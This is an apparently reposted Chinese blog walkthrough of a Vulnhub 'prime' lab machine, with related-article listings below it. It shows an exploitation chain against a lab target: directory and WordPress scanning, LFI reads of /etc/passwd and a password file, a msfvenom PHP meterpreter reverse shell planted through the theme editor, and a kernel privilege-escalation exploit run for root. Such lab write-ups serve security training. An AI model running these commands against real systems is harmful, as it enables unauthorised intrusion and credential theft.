渗透测试怎么搭建靶机_渗透测试实战——prime靶机入侵

最新推荐文章于 2024-06-08 13:47:27 发布
最新推荐文章于 2024-06-08 13:47:27 发布
阅读量335 收藏 3
点赞数 1
文章标签: 渗透测试怎么搭建靶机

原创:safe6合天智汇

原创投稿活动:

http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ

Ip:192.168.0.115

Kali:192.168.0.21

安装好的靶机界面

327e502c0738a57eb4b22d958023a901.png

Nmap扫描端口

【注:Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Nmap扫描相关的信息可以到合天网安实验室操作实验——Nmap网络扫描,http://www.hetianlab.com/expc.do?ec=ECIDee9320adea6e062017110717273100001

nmap-sV -A 192.168.0.115

c690c0bf1e2ba0e311bc237760cadf4d.png

发现只开了80和22端口,直接从80入口

9d28da88f45ba9a96e896a0d3b5dd6ae.png

扫描一下目录文件

dirbhttp://192.168.0.115

defc90f72bf2c0caf09006a7e0a305db.png

通过目录扫描得到

http://192.168.0.115/dev

http://192.168.0.115/secret.txt

http://192.168.0.115/index.php

http://192.168.0.115/image.php

http://192.168.0.115/wordpress

我习惯先从wordpress入手

访问看看http://192.168.0.115/wordpress

0a86e5aa601cbb18c005309bb3fda060.png

对wordpress进行扫描

wpscan--url http://192.168.0.115/wordpress/ --enumerate vt,vp,u

e7ff5b3b805467fcec2309ba1a264322.png

对wordpress进行扫描

最后只得到如下信息

主题WordPresstheme in use: twentynineteen

版本WordPressversion 5.2.2 identified (Insecure, released on 2019-06-18).

http://192.168.0.115/wordpress/readme.html

用户victor

没发现可以利用漏洞,直接尝试Wp爆破

b79b808bffced32cf87107fb61556058.png

没成功

继续访问其余扫描到的文件image.php和index.php差不多

e3783fb2129e240aa3b1b8b1a92bb61c.png

最后在secret.txt文件里发现了提示

5433000cd730d1958c98427d80208f07.png

dbdef33b62c602511ba5ce5f2933a6bf.png

根据github的提示用wfuzz进行测试,最后fuzz出来file参数

a1267a07b76c66e8a8939dc6472a76a2.png

我猜测是应该存在LFI,直接根据secret.txt文件里面提示的包含location.txt获得下一步提示

http://192.168.0.115/?file=location.txt

0498bddd7109628e90dceec616bdb6d2.png

最近成功得到location.txt内容,里面提示在其他php页面用secrettier360参数,

根据上面dirb得到的image.php进行测试

curlhttp://192.168.0.115/image.php?secrettier360=index.php

先尝试读取index.php发现成功

27502d84d916b7f956afd77cf4adc56b.png

尝试读取/etc/passwd

curlhttp://192.168.0.115/image.php?secrettier360=/etc/passwd

a121324ad4e987435c0f995fd64de153.png

LFI漏洞利用的方法学习可到合天网安实验室操作实验——LFI漏洞攻击实践,http://www.hetianlab.com/expc.do?ec=ECID9d6c0ca797abec2016032817180500001

于是继续fuzz,看看有没有什么有价值的文件

wfuzz-w safe6/DownFall-LogList.txt -c --hc 404 --hw 17

http://192.168.0.115/image.php?secrettier360=FUZZ

f11b50f5e4c5fb9b522e11e2f640d6a1.png

本来想找一下wp-config.php文件,fuzz无果回过头来看etc/passwd文件有什么用户,最后又在里面发现了线索(真是细节决定成败啊)

4ba418c6f1cf79b29dab906b55b1bbbb.png

看看password.txt文件 curlhttp://192.168.0.115/image.php?secrettier360=/home/saket/password.txt

7c0bec4fc52ad50a50866d0ee5394a6e.png

试一试ssh密码,发现是错的

0e14cf513bbcd6922241db9adc2a8e0b.png

试一试前面拿到的wordpress用户

f52efeda3967a1da96920385ba5f1473.png

没错,我进来了

e3244a243c5161d407b1623e3c003036.png

接下来直接拿webshell,打开我们最喜欢的主题编辑器

727cb5b67ba63ac336aacd06bcb52fb2.png

翻了半天,发现只有secret.php可用

于是乎,msf大法要上演了

生成一个payload放进去

msfvenom-p php/meterpreter_reverse_tcp LHOST=192.168.0.21 LPORT=4444 -oshell.php

a61b6632003388c203deca477786175d.png

24ac690cabd9d4921563cb729bdd4dbc.png

保存之后,打开msf

useexploit/multi/handler

setpayload php/meterpreter_reverse_tcp

setlhost 192.168.0.21

setlport 4444

run

97d547b07cc76523a48751f79473471d.png

浏览器打开

http://192.168.0.115/wordpress/wp-content/themes/twentynineteen/secret.php

755fb38c957042cfd0a5c8b4e1352ad8.png

d0459f1d55dd28904b97a7c75b55fb9e.png

MSF相关的学习,可到合天网安实验室学习实验——MSFvenom实践,http://www.hetianlab.com/expc.do?ec=ECID9db0-7e22-486f-a628-023583616a83通过该实验了解msfvenom和metasploit的用法,生成符合自己要求的shellcode,并成功利用shellcode,学会如何与metasploit配合使用。

接下来就是提权了

用python3-c 'import pty; pty.spawn("/bin/bash")'获取个完整交互的shell

e9ed53f6f681a9d273bbb4d231b0756d.png

切换到tmp目录,看一下内核准备提权(meterpreter里面sysinfo一样)

d4d701681aba05cbfde02c3a4c63ccb8.png

回到kali搜索searchsploit16.04 Ubuntu

c811f107ea2b2965530fc9156757d821.png

我们这里用LinuxKernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local PrivilegeEscalation进行提权

把45010.c拷到当前目录

cp/usr/share/exploitdb/exploits/linux/local/45010.c ./

编译一下gcc45010.c -o root

499063e7d6eecf24bc0f9fb7341a5dcf.png

然后exit()退回到meterpreter

上传一下编译好的

6ded1658c4dc81aac3535912f90c408f.png

./root执行一下

500d5394044833a82a12b4559f11d1d6.png

最后进入root目录拿到flag

5f8f0ffb307dc94161dda63928330e9c.png

欢迎各位师傅指点

声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!

weixin_39857876
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手把手教你搭建动态独立靶机的ctfd靶场
汗的博客
09-03 2033
因为是准备给学校搭的靶场,所以用的是阿里云的学生机 配置信息 CPU: 1核 内存: 2 GiB 带宽: 1Mbps 操作系统: CentOS 7.4 64位 配置各类基础环境 升级系统包&安装各类基础依赖包 yum update yum install -y git nginx mariadb mariadb-server Mysql-python python-pip gcc python-devel yum-utils device-mapper-persistent-data lvm2
CISP-PTE-Centos 靶机安装(保姆级教程)
honest_gg的博客
07-21 2063
CISP-PTE-Centos:考试(靶机)环境安装
win7系统smb永恒之蓝【漏洞复现】
鹅子鱼的博客:很菜但是很好学的小菜鸟
12-21 2234
win7系统smb永恒之蓝【漏洞复现】
vuInhub靶场实战系列--prime:2
最新发布
weixin_45221204的博客
06-08 1280
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍prime:2靶机渗透测试,该系统主要包含LFI和SMB漏洞,具体内容包括主机扫描(nmap\netdiscover\arp-scan)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch\gobuster)、wpscan扫描、netcat、反弹shell、容器相关内容、linux内核提权等内容。目标主机扫描目录扫描wpscan扫描netcat监听。
CISP-PTE web渗透通关攻略
DG_s1mple
12-09 1442
想考一个cisp-pte的证,最近在网上找了一下,找到一些资料,就先做了顺便把过程记录下来 这是老靶场打开页面告诉我们需要读取/tmp/360/key文件,我们把它记下来,然后点击进入答题 进入到如下界面 把sql输入的句子直接显示在页面上了,我们开始用HackerBar测试 发现输入1’)报错无法返回 输入1’)%23可以正常返回页面可以确定注入条件了,然后我们开始测试它的字段数量 发现空格被过滤了,我们使用注释来绕过/**/ 发现为4的时候页面可以正常返回,为5的时候不返回 确定字段数量为5
CISP-PTE综合题(二)附靶机下载
zonei123的博客
10-22 5285
文章写在公众号CISP-PTE综合题(二)附靶机下载
kali渗透综合靶机(九)--Typhoon靶机
W小哥
03-27 4483
一、靶机下载 下载链接:https://download.vulnhub.com/billu/Billu_b0x.zip 二、Typhoon靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.129 靶机IP:192.168.212.9 1、主机...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
CISP-PTE靶机练习(me-and-my-girlfriend)
千寻的博客
10-24 2145
通过靶机练习,学习笔记整理
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7752
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
cisp-pte考试靶场及通关攻略下载
潇湘信安的博客
02-17 2803
周末抽空找了几个CISP-PTE考试靶场和一份通关攻略文档,并将这份攻略整理成了PDF文档。
模拟cisp-pte 综合题三个key
小明师傅博客
06-15 6541
1.拿到ip地址,扫端口,扫目录不多说 有1443端口(SQL sever数据库) 和27666端口 2.扫出来这个地址,查看一下 访问一下,发现一个是后台,一个存在文件包含的网页,一个大概是上传地址 爆破一下后台发现不成功 试一下利用文件包含把web.config下载下来 成功下载下来打开发现数据库账号和密码 然后我们试图连上 连接上后,我们拿到后台账号密码,第一个key拿到 然后我们试图上传木马拿webshell 找到第二个key 查看文件时发现后面少了,我们卡位置刚好把jpg后缀
各种靶机搭建
qq_53365842的博客
04-20 3305
在docker环境搭建 搭建upload-labs靶机 (1)创建镜像 docker pull c0ny1/upload-labs (2)创建容器 docker run -d -p 8082:80 c0ny1/upload-labs:latest 搭建sqli labs 靶机 1.连接ssh 2.开启docker: sudo systemctl start docker systemctl status docker 3.docker 拉取镜像: docker pull c0ny1/sqli-labs:0.
【学渗透靶机——prime
jieli0901227的博客
05-13 247
提示使用secrettier360作为参数在每一个php 页面,有参数没有值,那我们就在index.php 和image.php 上测试文件包含漏洞。这台靶机开放端口 22 80 端口 使用nmap 扫描只有枚举的信息, 22 端口也没有账密信息 ,所以重点放在80端口上。接下来直接拿webshell,打开我们最喜欢的主题编辑器,翻了半天,只有secret.php 存在写权限,写入反弹shell。页面提示我挖错文件了,,那就尝试读取location.txt.,如下图。查看enc 文件 无读权限。
红队打靶:Prime1详细打靶思路之模糊测试+内核提权(vulnhub)
Bossfrank的博客
06-11 1498
本篇博客详述了vulnhub靶机prime1的打靶思路过程,并非简单复现writeup。打靶过程涉及到关于模糊测试及wfuzz工具的使用、文件包含漏洞利用、wordpress CMS、内核漏洞提权。有关OpenSSH渗透的方法将在下一篇博客中详述。
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习过程中,首先需要准备针对特定靶机的环境。本次学习的目标是lampiao靶机,其下载地址为https://download.vulnhub.com/lampiao/Lampiao.zip。考虑到下载速度的问题,也可以选择使用种子文件进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值